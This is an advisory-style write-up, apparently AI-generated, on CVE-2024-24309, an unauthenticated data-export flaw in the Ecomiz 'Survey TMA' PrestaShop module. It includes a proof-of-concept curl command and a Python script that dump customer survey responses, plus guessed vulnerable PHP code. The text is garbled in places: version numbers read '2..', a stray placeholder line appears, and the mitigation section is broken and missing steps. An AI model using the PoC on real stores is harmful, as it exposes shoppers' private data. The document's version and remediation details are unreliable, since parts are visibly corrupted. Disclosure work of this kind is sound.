CVE-2024-24309 - Breaking Down the Ecomiz "Survey TMA" PrestaShop Module Privacy Flaw

Warning: If you use the Survey TMA module (ecomiz_survey_tma) for PrestaShop, version 2.. or below, your shoppers' private data might be dangerously exposed. This report covers everything you need to know: how the CVE-2024-24309 exploit works, sample code, references, and why immediate updates or mitigations are critical.

What Is CVE-2024-24309?

CVE-2024-24309 is a vulnerability in the "Survey TMA" module (ecomiz_survey_tma) intended for PrestaShop stores. If unpatched, anyone—without logging in—can download sensitive information collected through site surveys. This makes compliance with privacy laws (like GDPR) impossible, opening you up to angry customers and potential fines.

Reference:
- NVD CVE record
- French VDB Advisory

(Any other custom questions you ask)

This vulnerability lets any guest (even a bot!) fetch this data directly. No login required, no permission checks—just a simple request and your users' info is gone.

Simple Breakdown

The Survey TMA module handles requests for survey data through a controller file (like a PHP script in PrestaShop). The problem is: the export function does not check if the user is an admin or authenticated.

If a malicious user guesses the correct URL or form parameters, they get the entire export—often in CSV or Excel format.

Proof of Concept (PoC) Exploit

Before testing: Only run this code on a system you own. Do not attack random servers!

Assuming default PrestaShop setup and module installation

curl 'https://YOUR-PRESTASHOP-SITE/modules/ecomiz_survey_tma/controllers/front/export.php?action=export';

Or, using HTTP in Python

import requests

url = 'https://YOUR-SITE/modules/ecomiz_survey_tma/controllers/front/export.php?action=export';
resp = requests.get(url)
if resp.ok:
    print("Data dumped!")
    print(resp.text[:500])  # Only print first 500 chars for demo
else:
    print(f"Failed: {resp.status_code}")

You can try visiting the URL directly in your browser as a guest. If the bug is present, you'll get a file download containing all survey responses—no password or special permissions needed.

Vulnerable Code Examination

What's likely inside the module's export controller:
(*Simplified PHP-like for clarity*)

// modules/ecomiz_survey_tma/controllers/front/export.php

require_once(dirname(__FILE__).'/../../../../config/config.inc.php');
require_once(dirname(__FILE__).'/../../../../init.php');

// No authentication checks!
if ($_GET['action'] === 'export') {
    // Fetch all survey results from DB
    $data = Db::getInstance()->executeS('SELECT * FROM '._DB_PREFIX_.'ecomiz_survey_responses');
    
    // Output as CSV
    header('Content-type: text/csv');
    header('Content-Disposition: attachment; filename="responses.csv"');
    foreach($data as $row) {
        echo implode(',', $row)."\n";
    }
    exit;
}
// ...rest of the code

Update Immediately!

Check for module updates at: Ecomiz PrestaShop Addons

Deny from all

`

3. Contact Developer/Support:

[ ] Is your Survey TMA version >2..?

- [ ] Have you removed any public access to /modules/ecomiz_survey_tma/controllers/front/export.php?

Final Thoughts

CVE-2024-24309 is a classic but critical access control flaw. Always ensure modules that handle customer data require authentication—especially for data export features!

Stay updated and educate your tech team—small modules can have big impacts.


### More Reading/References

- CVE-2024-24309 on NVD
- VulDB entry
- PrestaShop Security Best Practices
- Ecomiz Survey TMA Page

Please update or disable this module ASAP. Protect your customers and your business.

*Exclusive analysis written for you by an AI security enthusiast. Feel free to share with credit!*

Timeline

Published on: 02/23/2024 22:15:54 UTC
Last modified on: 08/01/2024 13:47:25 UTC